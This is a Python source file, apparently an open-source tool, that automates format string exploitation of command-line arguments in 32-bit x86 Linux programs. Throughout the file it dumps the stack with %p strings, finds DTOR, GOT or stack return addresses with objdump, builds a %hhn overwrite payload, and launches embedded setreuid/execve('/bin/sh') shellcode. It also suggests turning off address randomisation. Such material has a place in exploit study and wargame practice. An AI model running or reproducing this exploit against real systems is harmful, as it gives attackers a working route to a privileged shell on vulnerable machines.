#!/usr/bin/env python # Created by Paul Haas # Licensed under the GPLv3 '''Attempt automatic format string exploitation on argv1 of x86 binaries. It is possible to use format string attacks to gain information about the stack of the running binary. With this information, we can locate addressable location on the stack, including our shellcode location as well as return values and other potential exploit locations. In order to customize the attack for other binaries, both the execute_binary and execute_shellcode functions need to be modified to push the format string in the correct location, and return the output in the right format. ''' import sys import os import re import string import struct import logging from operator import itemgetter from subprocess import Popen,PIPE,call from optparse import OptionParser, OptionGroup, IndentedHelpFormatter import platform if platform.machine() != 'i686': raise Exception("i686 only, x86_64 is not supported") log = logging.getLogger("fmt_exp") log.setLevel(logging.WARNING) ch = logging.StreamHandler() formatter = logging.Formatter("%(filename)s:%(lineno)d: %(message)s") ch.setFormatter(formatter) log.addHandler(ch) # These are global because they are used just about everywhere OVERWRITE_STRING = "AAAABBBBCCCCDDDD" # 16 WRITE_FORMAT = '''%003c%03i$hhn%003c%03i$hhn%003c%03i$hhn%003c%03i$hhn''' # 52 #SHELLCODE = "\x31\xdb\x8d\x43\x17\x99\xcd\x80\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80" # exec '/bin/sh' SHELLCODE = "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"# setreuid(geteuid(),geteuid());execve("/bin/sh",0,0); NOP = '\x90' def execute_binary(binary, format): '''Return the output from our format string argument passed to the binary. The return value should be a string representing the result of the format string attack without any other characters or parsing, and may need to be customized for unusual binaries. ''' return Popen([binary, format],stdout=PIPE,close_fds=True).communicate()[0].strip() def execute_shellcode(binary, format): '''Similar to execute_binary, except this call passes control to it.''' call([binary,format]) def process_arguments(): usage = """Usage: %prog [options] binary Attempt automatic format string exploitation on the provided binary. Default action is to insert setreuid(geteuid(),geteuid()); execve('/bin/sh',0,0) shellcode at the end of the format string, and overwrite the DTOR address of the binary to return to it.""" global SHELLCODE, OVERWRITE_STRING, logger formatter = IndentedHelpFormatter(indent_increment=1, max_help_position=120, width=120, short_first=1) parser = OptionParser(usage=usage,formatter=formatter) # Testing methods: number of %p's, splitter, replacer, DUMMY # Verbose Methods -v -d , show shellcode, etc # Execute Methods: Control how binary is called and how it takes format string # Attack methods: Manual exploitation, or provide a print like statement # Include a generate vulnerable binary function? parser.add_option('-v', '--verbose', dest='verbose', action='count',help="Increase verbosity (specify multiple times for more) default is %default",default=2) parser.add_option('-q', '--quiet', dest='quiet', action='count',help="Decrease verbosity (specify multiple times for more)",default=0) overwrite_group = OptionGroup(parser, "Overwrite options","Arguments to determine location to overwrite in binary") overwrite_group.add_option("-d", "--dtor", action="store_true", dest="dtor", help="overwrite dtor address (%default)",default=True) overwrite_group.add_option("-g", "--got", type="string", dest="got", help="Overwrite GOT function (ie: exit)", metavar="function", default=False) #overwrite_group.add_option("-c", "--code", type="int", dest="code", help="Overwrite nth given code segment return address found on stack") overwrite_group.add_option("-c", "--code", action="store_true", dest="code", help="Overwrite first code segment return address found on stack") overwrite_group.add_option("-a", "--address", type="int", dest="overwrite", help="Custom overwrite address", metavar="0x12345678", default=False) parser.add_option_group(overwrite_group) exploit_group = OptionGroup(parser, "Exploit options","Arguments that control the how and where of our shellcode") exploit_group.add_option("-s", "--string", action="store_true", dest="stringsploit", help="Insert shellcode within format string (%default)",default=True) exploit_group.add_option("-S", "--Shellcode", type="string", dest="shellcode", help="Insert Custom shellcode in format string (ie: setuid(0); exec '/bin/sh')", metavar="shellcode") exploit_group.add_option("-E", "--Environ", action="store_true", dest="penv", help="Put shellcode into environment and use it") exploit_group.add_option("-e", "--environ", type="string", dest="env", help="Use address of given environment variable", metavar="name") exploit_group.add_option("-b", "--bytes", type="string", dest="findbytes", help="Find byte string on stack and point to it", metavar="90909090") exploit_group.add_option("-r", "--return", type="int", dest="returnaddr", help="Custom shellcode address", metavar="0x12345678") exploit_group.add_option("-o", "--offset", type="int", dest="offset", help="Custom stack offset to format string", metavar="123") parser.add_option_group(exploit_group) (options, args) = parser.parse_args() if len(args) != 1: parser.error("incorrect number of arguments") binary = args[0] options.verbose -= options.quiet if options.verbose > 4: options.verbose = 4 log.setLevel(logging.CRITICAL - options.verbose*10) if options.shellcode: SHELLCODE = options.shellcode log.info("Replacing exploit with custom shellcode of length %i: %s" % (len(SHELLCODE),repr(SHELLCODE))) if options.penv: if options.env: log.debug("Placing shellcode in '%s' env variable" % options.env) os.putenv(options.env,SHELLCODE) else: log.debug("Placing shellcode in 'SHELLCODE' environment variable") os.putenv('SHELLCODE',SHELLCODE) options.env = 'SHELLCODE' if options.env and '=' not in options.env: options.env += '=' if (bool(options.overwrite) + bool(options.got) + bool(options.code != None)) > 1: parser.error("can only use a single overwrite address") elif options.overwrite or options.got or options.code is not None: options.dtor = False if options.dtor: p1 = Popen(["objdump", "-s", "-j",".dtors", binary], stdout=PIPE) p2 = Popen(["tail", "-n1"], stdin=p1.stdout, stdout=PIPE) p3 = Popen(["cut", "-d ", "-f2"], stdin=p2.stdout, stdout=PIPE) options.overwrite = int(p3.communicate()[0],16)+4 log.debug("Found DTOR address for binary '%s' at: %#x" % (binary,options.overwrite)) elif options.got: p1 = Popen(["objdump", "--dynamic-reloc", binary], stdout=PIPE) p2 = Popen(["grep", " %s$" % options.got], stdin=p1.stdout, stdout=PIPE) # Exact match RE p3 = Popen(["cut", "-d ", "-f1"], stdin=p2.stdout, stdout=PIPE) options.overwrite = int(p3.communicate()[0],16) log.debug("Found got address for function '%s' of binary '%s' at: %#x" % (options.got,binary,options.overwrite)) elif options.code is not None: log.info("Overwrite address will be found on stack") options.overwrite = 0x00000000 # We will search for it later if options.overwrite: #log.debug("Using custom overwrite address for '%s': %#x" % (binary,options.overwrite)) log.info("Overwrite address starts at: %#8x" % options.overwrite) if options.returnaddr or options.env or options.findbytes: # They have choosen their own shellcode location, so remove the default SHELLCODE = '' options.stringsploit = False #log.info("Overwrite address starts at: %#8x" % options.overwrite) OVERWRITE_STRING = overwrite_address2string(options.overwrite) return binary, options def overwrite_address2string(address): '''Represent a 4-byte address as a string of each sub address in it.''' r1 = struct.pack('L',address+0) r2 = struct.pack('L',address+1) r3 = struct.pack('L',address+2) r4 = struct.pack('L',address+3) address_string = "%s%s%s%s" % (r1,r2,r3,r4) return address_string def get_stack_dump_format(pnum=504, DUMMY = NOP): ''' Align the length of our stack dump format string to a modulus 16 equivalent length of our exploit format string. This saves some effort later on in locating our stack offset and string offest to our exploit format string. ''' global OVERWRITE_STRING, WRITE_FORMAT, SHELLCODE modulus_match = len(OVERWRITE_STRING + WRITE_FORMAT + SHELLCODE) % 16 # Make sure our exploit format is of even length to match even stack format if modulus_match % 2 == 1: SHELLCODE += DUMMY modulus_match = len(OVERWRITE_STRING + WRITE_FORMAT + SHELLCODE) % 16 stack_dump_format = "%p" * pnum format_match = len(stack_dump_format) % 16 if format_match != modulus_match: if modulus_match > format_match: modulus_match += 16 stack_dump_format = "%p" * (pnum + ((modulus_match - format_match) / 2)) format_match = len(stack_dump_format) % 16 modulus_match %= 16 if format_match != modulus_match: log.critical("Modulus of our stack dump format string does not match our potential exploit format string: %i vs %i" % (format_match, modulus_match)) exit(1) return stack_dump_format def dump_stack(binary,format): '''Convert our %p format parameter output to a well formed list of longs.''' output = execute_binary(binary,format) stack = [int(x,16) for x in output.replace('(nil)','0x0').split('0x') if x] if len(stack) != len(format)/2: log.critical("Error matching stack length to our provided dump format: %i vs %i" % (len(stack),len(format)/2)) exit(1) log.debug("Stack: [%s]" % ", ".join("%#08x" % s for s in stack)) return stack def tedious_dump_stack(binary,format="%p"*504): '''Assuming we have a small buffer and cannot fit our long stack dump format string, we can still perform an equivalent stack dump by calling the binary multiple times with a format string for each stack offset. This permits a smaller buffer at the trade off of requiring multiple calls of the binary. ''' global OVERWRITE_STRING, WRITE_FORMAT, SHELLCODE modulus_match = len(OVERWRITE_STRING + WRITE_FORMAT + SHELLCODE) % 16 format_match = len('%000$x') % 16 pad = '' if format_match != modulus_match: if format_match > modulus_match: modulus_match += 16 pad = ' ' * (modulus_match - format_match) format_match = len('%000$x'+pad) % 16 modulus_match %= 16 log.info("matched stack dump and exploit modulus: %i vs %i" % (format_match,modulus_match)) # This line does all the tedium of running the binary multiple times and converting the output stack = [int(execute_binary(binary,"%%%03i$x%s" % (o,pad)),16) for o in range(1,len(format)/4+1)] # Use a RE to find our offset getter on the stack # We should also return the format_stack_offset, format_string_adjust match = re.search(r'%%\d{3}\$x%s' % pad,stack_to_string(stack)) if not match: log.critical("RE did not find our format string stack offset string") exit(1) new_format = match.group() return stack, new_format def stack_to_string(stack): '''Convert a given list of long addresses into a single string''' return ''.join([struct.pack('L',s) for s in stack]) def get_strings(characters,length=4): '''Get list of printable strings of given length that are NULL terminated.''' printables = ''.join([c for c in characters if c in string.printable+'\x00']) return [s for s in printables.split('\x00') if len(s) >= length] def get_tedious_string_location(binary, stack, format_length, bottomstack = 0xbff00000, topstack = 0xc0000000): '''Similar to tedious_dump_stack, this calls the binary separately for each addressable location we discover on the stack from our previous format string attack. This is a much slower approach, but sidesteps the parsing requirements of our efficient string_location function. ''' stack_pointers = [(i+1,s) for i,s in enumerate(stack) if bottomstack < s < topstack] splitted_strings = [execute_binary(binary, "%%%03i$s" % o) for o,p in stack_pointers] # Find our format string in a list of strings format = [s for s in splitted_strings if re.match(r'%\d{3}\$s',s)][0] format_string_offset, format_string_address = stack_pointers[splitted_strings.index(format)] format_string_offset -= 1 stack_string_structure = [] for i,pointer in enumerate(stack_pointers): offset, address = pointer append = (offset, address, splitted_strings[i]) stack_string_structure.append(append) return format_string_offset, format_string_address, stack_string_structure ################################################################################ def get_string_location(binary, stack, format_length, bottomstack = 0xbff00000, topstack = 0xc0000000, splitter = '||' ,replacer = '::'): '''From our previous format string attack, we effectively dump each value on the stack as an address. We can determine which of these addresses are valid pointers to other data on the stack, and attempt a second format attack in order to dump these addresses as strings. This allows us to locate our format string address on the stack, in addition to environment variables and other readable strings. ''' stack_pointers = [(i+1,s) for i,s in enumerate(stack) if bottomstack < s < topstack] format = ''.join(["%%%i$s%s" % (o,splitter) for o,a in stack_pointers]) stack_strings = execute_binary(binary, format) if not stack_strings: log.critical("Something went wrong obtaining strings on the stack, try changing offsets %#8x < stack < %#8x" % (bottomstack,topstack)) exit(1) # Identify the location of our format string start = stack_strings.index(format) end = start + len(format) # Insert a new format string with the splitter character replaced, and then split up the strings splitted_strings = (stack_strings[0:start] + format.replace(splitter,replacer) + stack_strings[end:]).split(splitter)[:-1] # Replace our original format string at the correct location in the splitted string list splitted_strings[splitted_strings.index(format.replace(splitter,replacer))] = format if len(stack_pointers) != len(splitted_strings): log.critical("Number of stack pointer addresses does not match number of strings resolved on stack: %i vs %i" % (len(stack_pointers),len(splitted_strings))) log.critical("Consider adjusting splitter and replacer sequences to be unique in the stack: '%s' '%s'" % (splitter,replacer)) exit(1) format_string_offset, format_string_address = stack_pointers[splitted_strings.index(format)] format_string_offset -= 1 # String structure will be useful for finding bytes or other information on the stack stack_string_structure = [] for i,pointer in enumerate(stack_pointers): offset, address = pointer append = (offset, address, splitted_strings[i]) stack_string_structure.append(append) return format_string_offset, format_string_address, stack_string_structure def adjust_address_to_exploit(format_string_address,stack_structure,format_length,format_string_adjust): '''Our information format strings are at a slightly different offset than our exploit format string. This function alights the second address from the first. ''' global OVERWRITE_STRING, WRITE_FORMAT, SHELLCODE format_return_address = (format_string_address + format_length) - (len(SHELLCODE) + format_string_adjust) log.debug("Our exploit string is located at: %#8x" % ((format_string_address + format_length) - (len(OVERWRITE_STRING+WRITE_FORMAT+SHELLCODE) + format_string_adjust))) adjusted_structure = [] for offset,address,string in stack_structure: if address <= format_string_address: address += format_length - (len(OVERWRITE_STRING+WRITE_FORMAT+SHELLCODE) + format_string_adjust) append = (offset,address,string) adjusted_structure.append(append) return format_return_address, adjusted_structure # ps -ef | grep "^`id -nu`" | tr -s ' ' | cut -d' ' -f2 | xargs -I{} head -n2 /proc/{}/maps 2>/dev/null def find_data_return_address(stack,bottomdata = 0x08048000, topdata = 0x08100000): # 0x09000000 '''Return addresses the correspond roughly to the data section of the binary.''' data_pointers = [(i+1,s) for i,s in enumerate(stack) if bottomdata < s < topdata] return data_pointers def find_string_address(binary,stack,format,options): '''Given a binary, a list of values on the stack, and a format string used to derive that stack, find the stack offset and address of the format string''' global OVERWRITE_STRING, WRITE_FORMAT, SHELLCODE format_length = len(format) stack2string = stack_to_string(stack) if format not in stack2string: log.info(format, repr(stack2string)) log.critical("Non-constant stack? Try:\n\tsudo sysctl -w kernel.randomize_va_space=0") exit(1) # %0$x is not valid, the first pointer we access is %1$x, hence we start from 1, not 0 format_stack_offset = stack2string.index(format)/4 + 1 format_string_adjust = stack2string.index(format)% 4 # Handle command line options here, there may be a better location for this format_string_offset, format_string_address, stack_structure = get_string_location(binary, stack, format_length) #format_string_offset, format_string_address, stack_structure = get_tedious_string_location(binary, stack, format_length) format_return_address, stack_structure = adjust_address_to_exploit(format_string_address,stack_structure,format_length,format_string_adjust) return_address = None if options.code is not None: data_pointers = find_data_return_address(stack) #data_return_offset, data_return_location = data_pointers[options.code] data_return_offset, data_return_location = data_pointers[0] #log.debug(["%i: 0x%08x" % (o,a) for o,a in data_pointers]) exploit_format_string_address = (format_string_address + format_length) - (len(OVERWRITE_STRING+WRITE_FORMAT+SHELLCODE) + format_string_adjust) data_ptr_stack_address = exploit_format_string_address - (4 * format_stack_offset) + (4 * data_return_offset) #print "Old format string offset %i: address %#x, exploit format offset %i: address %#x adjusted by %i" % (format_stack_offset,format_string_address,format_stack_offset,new_format_string_address,format_string_adjust) log.info("Overwriting data segment return address %#x found in stack at offset %i address %#x" % (data_return_location,data_return_offset,data_ptr_stack_address)) options.overwrite = data_ptr_stack_address OVERWRITE_STRING = overwrite_address2string(options.overwrite) if options.stringsploit: return_address = format_return_address elif options.env: for offset,address,string in stack_structure: if options.env in string: return_address = address + len(options.env) #print "Environment variable '%s' is at %#x, so return address is at %#x" % (options.env,address,return_address) break if not return_address: log.critical("Could not find environment variable '%s' in stack" % options.env) exit(1) elif options.findbytes: #print "Looking for",repr(options.findbytes) for offset,address,string in stack_structure: if options.findbytes in string: return_address = address + string.index(options.findbytes) log.debug("Found bytes at address %#x in string %s at offset %i, so return address is %#x" % (address,repr(string),string.index(options.findbytes),return_address)) break if not return_address: log.critical("Could not find provided bytes '%s' in stack" % repr(options.findbytes)) exit(1) if options.offset: format_stack_offset = options.offset if options.returnaddr: return_address = options.returnaddr log.info("Overwrite: %#8x return: %#8x, stack offset: %i, string adjust: %i" % (options.overwrite,return_address,format_stack_offset,format_string_adjust)) return return_address, format_stack_offset, format_string_adjust def write_address(address,difference=16): ''' Convert the choosen address into a sorted list of values to write with %n ''' b1 = int((address & 0xFF)) b2 = int((address & 0xFF00) >> 8) b3 = int((address & 0xFF0000) >> 16) b4 = int((address & 0xFF000000) >> 24) if b1 < difference: b1 += 0x100 if b2 < difference: b2 += 0x100 if b3 < difference: b3 += 0x100 if b4 < difference: b4 += 0x100 ordered = {'0':b1,'1':b2,'2':b3,'3':b4} # return a sorted list from a dictionary ordered by item value format = sorted(ordered.items(), key=itemgetter(1)) return format def perform_exploit(return_address, stack_offset, string_adjust, DUMMY = NOP): ''' Format strings have a bunch of circular dependencies in their format. Here, we approximate on what we know is expected. ''' global OVERWRITE_STRING, WRITE_FORMAT, SHELLCODE difference = len(OVERWRITE_STRING) # 16 adjust = DUMMY * string_adjust write_format = write_address(return_address,difference) # Rewrite this loop to be more friendly write = '' for num,required in write_format: if required-difference != 0: #print "So far, we have written %i characters, and we need to write %i total for offset %i, so add %%%03ic (%i)" % (difference,required,int(num),required - difference,required - difference) write += "%%%03ic%%%03i$hhn" % (required-difference,stack_offset+int(num)) else: # Match case where 2 bytes are same value in format write += "%%%03i$hhn" % (stack_offset+int(num)) adjust += DUMMY * 5 difference = required format = OVERWRITE_STRING + write + SHELLCODE + adjust if '\x00' in format: log.critical("NULL BYTE found in format at index %i, please try another exploit method" % format.index('\x00')) exit(1) log.debug("Created exploit is of length: %i (modulus 16: %i), string adjust is %i" % (len(format), len(format) % 16, string_adjust)) return format def verify_exploit(binary, format, options, return_address, stack_offset, string_adjust): ''' Check to see if the correct overwrite addresses would be overwritten. For some unknown reason, even after modulus matching, our offsets are still off by +4. If we could address this issue, we could skip this function and skip an extra execution of the binary. ''' out = execute_binary(binary, format.replace("$hhn","$p||")) overwrite_addresses = [int(a[:a.index('||')],16) for a in out.replace('(nil)','0x0').split('0x') if '||' in a] if ((options.overwrite+0 not in overwrite_addresses) and (options.overwrite+1 not in overwrite_addresses) and (options.overwrite+2 not in overwrite_addresses) and (options.overwrite+3 not in overwrite_addresses)): log.debug("Our overwrite addresses starting from %#8x are not in our exploit overwrites: %s" % (options.overwrite, ", ".join(["0x%08x" % a for a in overwrite_addresses]))) #log.debug(["0x%08x" % a for a in overwrite_addresses]) #,repr(''.join([struct.pack('L',a) for a in overwrite_addresses]))) log.warning("Adjusting our stack offset from %i to %i due to unknown stack alignment issue" % (stack_offset,stack_offset+4)) format = perform_exploit(return_address, stack_offset+4, string_adjust) return format def main(): '''Modular execution of a complete format string attack''' binary, options = process_arguments() format = get_stack_dump_format() stack = dump_stack(binary,format) #stack, format = tedious_dump_stack(binary,format) return_address, stack_offset, string_adjust = find_string_address(binary,stack,format,options) format = perform_exploit(return_address, stack_offset, string_adjust) format = verify_exploit(binary, format, options, return_address, stack_offset, string_adjust) log.debug("Launching Exploit, Good Luck!") execute_shellcode(binary, format) if __name__ == '__main__': main()